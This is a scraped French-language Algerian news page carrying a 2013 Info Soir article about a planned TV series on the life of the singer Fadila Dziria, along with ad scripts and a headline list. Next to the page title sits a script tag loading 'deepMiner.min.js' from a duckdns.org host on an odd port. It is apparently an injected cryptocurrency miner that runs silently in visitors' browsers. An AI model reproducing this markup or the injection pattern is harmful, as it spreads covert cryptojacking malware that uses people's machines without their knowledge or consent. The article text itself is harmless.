googletag.defineSlot('/21620968445/Djazairess_Fr_Article_1', [[336, 280], [300, 300], [300, 250], [300, 600]], 'div-gpt-ad-142634874-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_1', 'div-gpt-ad-142634874-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_3', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634876-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_3', 'div-gpt-ad-142634876-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_2', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634875-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_2', 'div-gpt-ad-142634875-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Widget', [[222, 280]], 'div-gpt-ad-1524625614-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Widget', 'div-gpt-ad-1524625614-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Siteunder', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-930032573-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Siteunder', 'div-gpt-ad-930032573-0-oop').addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices();}); Djazairess : Bientôt un feuilleton sur la vie de Fadila Dziria<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
 
En bref…    La démission surprise d'Ould Abbès    Louisa Hanoune fustige les partisans de la «continuité»    Un élu de l'APW pour représenter le FLN    La sous-traitance représente 10% de l'activité    Marchés pétroliers : La surabondance annonce-t-elle une mauvaise année ?    Un dialogue pour désamorcer la crise    Libye, la quadrature du cercle    Jamal Khashoggi, Ankara enfonce Riyad par petites doses    Votre week-end sportif    Violences dans les gradins du 5-Juillet    Le Mouloudia a mal de ses recrues estivales    Campagne d'information pour expliquer le projet    Plus de 33 000 pétards saisis à Djimla    Des dizaines de villageois de Souk-Lekhmis bloquent le CW15    Six millions d'Algériens sont diabétiques    Zombies-Land !    Logements sociaux : Les recalés des listes des bénéficiaires protestent    Assassinat par la DST en novembre 1954 de Kacem Zeddour Mohammed-Brahim Une affaire d'Etat    WA Tlemcen: Biskra, un cap important pour le Widad    USM Bel-Abbès: Un exploit qui en appelle d'autres    FLN: Ould Abbès démissionne    Ce n'est pas Trump le problème mais l'Amérique qui l'a élu    Europe: «Brexit or not Brexit ?»    Le pétrole, toujours    Le FFS dénonce: Le projet de loi de finances 2019 «présenté de façon expéditive»    Skikda: Saisie de kif, 8 arrestations    Suite aux nombreuses opérations de relogement: Des terrains combinés de proximité pour les nouveaux pôles urbains    Lycée Dergham Hanifi: La police sensibilise les élèves sur les dangers de l'Internet    Présidentielle : on se perd en conjectures !    EN - Les Verts dès demain à Lomé: Belmadi mobilise ses troupes    France 1914-1918 : centenaire de l'Armistice, le 11 novembre    Le virus des primaires    Est-il Halal de prier à la grande mosquée d'Alger ?    Hamas plonge Israël dans une crise politique    FLN : Démission de M. Ould Abbes pour des raisons de santé    Bedoui : " L'Algérie est sur de bons rails vers un lendemain meilleur "    Situation économique et sociale alarmante dans la wilaya de Khenchela :    FLN : Ould Abbès "débarqué"    Des otages druzes libérés portent en triomphe Bachar el-Assad    Les assiettes foncières inexploitées seront mises à la disposition des porteurs de projets    Arnaud Montebourg nouveau président de l'Association    2e édition du prix Cheikh Abdelkrim-Dali à Alger    L'étape d'Alger a coûté 5 MD    «Nous allons à Lomé pour la gagne»    Le Hamas et l'Etat hebreu: Crise politique en Israël    L'échec programmé de Rome    Disney : Les exploits des super-héros font les affaires de Mickey    







Merci d'avoir signalé!
Cette image sera automatiquement bloquée après qu'elle soit signalée par plusieurs personnes.





Bientôt un feuilleton sur la vie de Fadila Dziria
Publié dans Info Soir le 06 - 11 - 2013

Patrimoine - Authentique représentante de la chanson féminine algéroise, la grande cantatrice Fadhila Madani Bent El-Mahdi dite Fadila Dziria, a été très présente lors du festival.
Elle a beaucoup appris de Maalma Yemna et de Meriem Fekkaï, illustres interprètes de la chanson traditionnelle algérienne. Née le 25 juin 1917 à Alger, l'artiste s'adonne à la chanson dès l'âge de 8 ans selon sa nièce, présidente de l'association «Ahbab Fadila Dziria». Elle a été mariée à 13 ans.
Puis elle a accouché d'une mort-née à laquelle elle a dédié une chanson. A Paris, Fadila Dziria chantait pour les Maghrébins. Elle a côtoyé le regretté Abdelhamid Ababssa qui lui a appris le mode «Yey Yey». Elle a également chanté en kabyle. «Ben Hamadi lui écrira une chanson qu'elle n'a jamais enregistrée», nous révèle sa nièce Radia Selmi Kouli.
Outre l'algérois, elle a aussi chanté le sahraoui. Fadila la chanteuse, était Fadila la moudjahida aussi. Tout en maintenant son activité artistique intense, elle était chargée avec sa sœur Goussem, de la collecte de fonds au profit de la Lutte de Libération nationale. Ce qui lui a valu de faire de la prison à Serkadji. A sa sortie, elle forme son propre ensemble musical avec sa sœur à la percussion (derbouka), Soltana Daoud dite «Reinette l'Oranaise» au violon et sa mère, Assia au piano. Radia Selmi a révélé à InfoSoir qu'un feuilleton sera bientôt tourné sur le parcours et la biographie de sa tante paternelle Fadila. «Nous sommes en phase de recherches. Nous allons signer un contrat pour ce film qui sera diffusé au ramadan prochain.»
Se disant très honorée par cet hommage rendu à sa tante, Radia affirme que sa tante s'est totalement consacré à son art auquel elle a tout donné. «Elle ne chantait pas pour l'argent.
Elle aimait la chanson qui était sa joie de vivre. Elle aimait écouter Titma et Meriem Fekkaï. Mais elle n'a jamais reproduit leurs chansons ; Elle disait : «Elle chante comme je pleure.»
Elle avait un frère violoniste dit «Amar le son» sa sœur Hamida au tar, Mina à la derbouka et Goussem au violon.
L'artiste Mohamed Slim a tenu à nous préciser qu'il a eu la chance de côtoyer Fadila Dziria. «J'ai fait des tournées avec elle en compagnie de Haddad el-Djilali, Hachlef, Mohamed El-Amari, Guerouabi et Abderrahmane Aziz», avant de poursuivre : «J'en garde de beaux souvenirs. Par exemple, à Berrouaghia, lors d'une tournée effectuée en 1957-1958, les hommes dont Deriassa, El-Amari, Djillali, ont passé la nuit dans un hammam après une douche et les femmes dont Djamila, Fatiha Berber, Rabha, El-Ghalia dans la salle de spectacles faute de lieux d'hébergement ou d'hôtels.»
Mohamed Slim a commencé la chanson dans les années 50 avec la troupe «El-warda el-beïda» de Mustapha Sahnoun. Aujourd'hui, il prépare un album de 6 nouvelles chansons (neyli, staïfi et tunisien) avec maître Abdelkader Choukri. «Je vais renouveler ma fameuse chanson Ikhwani la tansaw choudakom» avec l'orchestre symphonique.


Cliquez ici pour lire l'article depuis sa source.